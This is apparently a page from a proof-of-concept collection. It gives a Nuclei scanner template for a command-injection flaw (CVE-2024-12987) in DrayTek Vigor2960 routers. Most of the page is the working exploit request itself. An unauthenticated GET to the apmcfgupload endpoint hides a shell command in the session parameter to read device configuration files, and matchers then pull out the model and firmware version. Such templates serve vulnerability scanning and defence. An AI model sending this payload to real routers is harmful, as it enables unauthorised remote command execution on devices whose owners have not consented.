POC -draytek-vigor2960 ( CVE-2024-12987 )

Template Nuclei : draytek-vigor2960-cmd-injection.yaml

id: draytek-vigor2960-cmd-injection

info:
  name: DrayTek Vigor2960 RCE via apmcfgupload (CVE-TBD)
  author: quangvu
  severity: critical
  description: |
    DrayTek Vigor2960 routers running firmware version 1.5.1.4 are vulnerable
    to remote command injection via the `apmcfgupload` endpoint. This allows
    unauthenticated attackers to execute arbitrary commands on the device.
  tags: rce,draytek,router,command-injection,iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxx0.%2524c%2525%24{IFS}cat${IFS}/etc/persistence/config/device_in*"

    headers:
      User-Agent: nuclei-scanner

    matchers:
      - type: word
        words:
          - "ModelName"
          - "Vigor2960"
          - "SoftwareVersion"
        condition: and
        part: body

    extractors:
      - type: regex
        part: body
        regex:
          - "ModelName'.*?'(.*?)'"
          - "SoftwareVersion'.*?'(.*?)'"

Other Python code

PreviousPocNextFor Security

Last updated

Was this helpful?